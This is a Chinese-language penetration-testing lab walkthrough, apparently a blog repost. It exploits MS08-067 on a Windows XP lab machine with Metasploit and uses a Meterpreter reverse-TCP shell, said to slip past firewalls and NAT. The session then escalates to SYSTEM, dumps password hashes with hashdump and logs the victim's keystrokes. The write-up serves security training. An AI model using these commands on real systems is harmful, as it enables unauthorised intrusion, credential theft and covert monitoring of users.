3.6 Meterpreter 键盘记录
目錄
一、預備知識
1、Metasploit 框架介紹
2、滲透攻擊基礎
二、實驗環境
三、實驗步驟
一、預備知識
1、Metasploit 框架介紹
??????? Metasploit框架由庫、接口和模塊三部分組成,本實驗關注的重點是各個接口和模塊的功能。interface(控制臺、CLI、Web、GUI等)為處理模塊(漏洞利用、有效載荷、輔助工具、加密引擎、Nops等)提供操作接口。每個模塊都有自己的價值,在滲透測試中起到不同的作用,具體如下:
??????? (1)漏洞利用。漏洞利用是一串驗證性代碼,主要針對目標系統的特定漏洞開發;
??????? (2)有效載荷。有效載荷是一段惡意代碼,也有可能是漏洞驗證程序的一部分,還可能是獨立編譯后用于在目標系統上運行的任意命令;
??????? (3)輔助工具。輔助工具是一個工具集,用于掃描、嗅探、區域撥號、獲取指紋及其他安全評估任務。
??????? (4)加密引擎。開發用來加密滲透測試中的有效載荷,以對抗殺毒軟件、防火墻、IDS/IPS及其他類似的反惡意軟件的查殺;
??????? (5)NOP(空操作)。NOP是一個匯編指令,通常插入shellcode,不起任何作用,只是用來為有效載荷占位。
??????? Meterpreter是Metasploit框架中的一個功能模塊,通常作為漏洞溢出后的攻擊載荷來使用,攻擊載荷能在觸發漏洞后返回給攻擊者一個控制通道。
2、滲透攻擊基礎
(1)msf>show exploit
??????? 這個命令會顯示Metasploit框架中所有可用的滲透攻擊模塊。
(2)msf>show auxiliary
??????? 這個命令會顯示所有的輔助模塊以及它們的用途。
(3)msf>show options
??????? 當你選擇了一個模塊,并輸入msf>show options后,會列出這個模塊所需的各種參數;如果你沒有選擇任何模塊,那么該命令會顯示所有的全局參數。
(4)msf>show payload
??????? 與show optinos一樣,當你在當前模塊的命令提示符下輸入show payload命令,Metasploit只會將與當前模塊兼容的攻擊載荷顯示出來。
(5)msf>show targets
??????? Metasploit的滲透攻擊受到目標操作系統的類型影響,該命令可以設置特定的系統版本。
二、實驗環境
??????? 攻擊機:BackTrack 5 r3
??????? 靶機:win xp sp3(English)
三、實驗步驟
1、啟動MSF Console;
2、攻擊機與靶機互ping一下,保證兩臺主機的網絡連通性;
3、用nmap掃描靶機,命令如下:nmap -sT -A --script=smb-check-vulns -PO <IP地址>;
???????? 注:-sT是指隱秘的TCP連接掃描;-A是指高級操作系統探測功能,它會對一個特定服務進行更深入的旗標和指紋攫取;--script=smb-check-vulns為nmap的一個插件。
???????? 由結果可知,靶機上存在一個ms08-067的漏洞。
4、輸入“search ms08_067_netapi”命令,查詢“ms08_067_netapi”的相關信息;
5、輸入“use exploit/windows/smb/ms08_067_netapi”命令,加載這個模塊(windows/smb/ms08_067_netapi);并設置攻擊載荷為基于windows系統的Meterpreter reverse_tcp,這個載荷在攻擊成功后,會從目標主機發起一個反彈連接,連接到LHOST中指定的IP地址(這種反彈可以讓你繞過防火墻的入站流量保護,或者穿透NAT網關);
7、因為MS08-067是一個對操作系統版本依賴性很高的漏洞,因此我們在此用"show target"命令顯示出這個特定漏洞滲透攻擊模塊所有可用的目標操作系統版本;
???????? 注:攻擊成功與否取決于目標主機的操作系統、安裝的服務包(Service Pack)版本以及語言類型,同時還依賴是否成功繞過數據執行保護(DEP:Data Execution Prevention)。DEP是為了防止緩沖區溢出攻擊而設計的,它將程序堆棧設計為只讀,以防止shellcode被惡意放置在堆棧區并執行。
??????? NX(No Execute),不允許執行,即啟動了DEP保護。
8、設置target:"set TARGET 6";設置靶機地址:“set RHOST <IP地址>”;
設置攻擊機地址:“set LHOST <IP地址>”;設置攻擊機監聽的TCP端口號:“set PORT 8080”;
???????? 注:設置端口參數:最好選擇能通過防火墻的常用端口號。
9、輸入“exploit”命令初始化攻擊環境,并開始對目標進行攻擊;
10、在“meterpreter>”后輸入“help”命令,可以查看關于Meterpreter的詳細使用方法說明;
11、執行完exploit命令后,就已經獲得了一個Meterpreter shell。接下來獲取系統權限,先執行“getdid”,獲取系統的運行賬戶;
????????輸入“getsystem”命令獲取系統權限,此外,也可以輸入“getsystem -h”獲取針對“getsystem”命令的詳細使用方法;
?12、輸入“sysinfo”命令,查看目標主機的信息;
?13、通過“run hashdump”命令,獲取系統用戶的Hash值;
14、Meterpreter還能記錄目標主機的鍵盤輸入信息。首先,輸入“ps”命令,查看目標主機上運行的進程;
?15、輸入“migrate 1588”啟動explorer.exe;
16、繼續運行“getuid”命令,可以看到已經具有Administrator權限;
?17、啟動鍵盤記錄命令“keyscan_start”,開始記錄鍵盤信息;
??????? 輸入“keyscan_dump”,進行鍵盤輸入信息的監聽;
???????? 在靶機上打開記事本隨便輸入一些字符, 在BT5上就可以獲取鍵盤輸入的信息了;
????????輸入“keysacn_stop”,停止鍵盤記錄。
?四、實驗中出現的問題:
????????按照教材,不論是win xp的英文版、win xp的中文版以及windows server 2003中文版,都不能用ms03-026漏洞進行實驗,會報錯,如下圖:
???????? 解決方法:
??????????????? (1)操作系統用win xp英文版;
??????????????? (2)漏洞用ms08-067;
?
?
總結
以上是生活随笔為你收集整理的3.6 Meterpreter 键盘记录的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 3种简单的键盘记录简单介绍
- 下一篇: 纯真ip数据库 转mysql_如何把纯真